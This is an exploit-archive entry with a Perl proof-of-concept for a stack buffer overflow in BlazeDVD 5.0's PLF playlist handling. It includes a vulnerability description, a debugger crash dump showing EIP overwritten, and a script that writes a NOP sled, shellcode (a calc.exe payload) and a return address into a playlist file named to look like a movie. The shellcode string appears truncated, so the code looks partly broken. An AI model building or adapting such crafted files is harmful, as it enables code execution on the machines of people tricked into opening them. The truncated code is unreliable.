BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow

Related Vulnerabilities: CVE-2006-6199  
Publish Date: 10 Aug 2008
Author: LiquidWorm

# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
# Product web Page:
# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be
# exploited via crafted PLF playlist file localy and remotely. It fails to
# perform boundry checking of the user input file, allowing the EIP to be
# overwritten, thus, controling the next insctruction of the software. After
# succesfull exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
# WinDgb(output):
#  - (4d8.f80): Access violation - code c0000005 (first chance)
#  - First chance exceptions are reported before any exception handling.
#  - This exception may be expected and handled.
#  - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
#  - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0         nv up ei pl nz ac pe nc
#  - cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
#  - 41414141 ??              ???
# Tested on Microsoft Windows XP SP2 (English)
# Vulnerability discovered by: Parvez Anwar and Greg Linares
# Refs:
# -
# -
# -
# -
# -
# -
# Exploit coded by Gjoko 'LiquidWorm' Krstic
# 08.08.2008

print "\n|==================================================================|\n";
print "|                                                                  |\n";
print "|    BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "|              by LiquidWorm <liquidworm [at]>           |\n";
print "|                                                                  |\n";
print "|==================================================================|\n\n";

$nop = "\x90" x 96;

# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub

$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee".

$ret = "\x78\x53\xbe\x01";

$payload = $nop.$shellcode.$ret;

open(plf, ">./The_Dark_Knight.plf");

print plf "$payload";

print "\n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!\n\n";

print "\n...t00t w00t!\n\a\n";

# August, 2008

# [2008-08-10]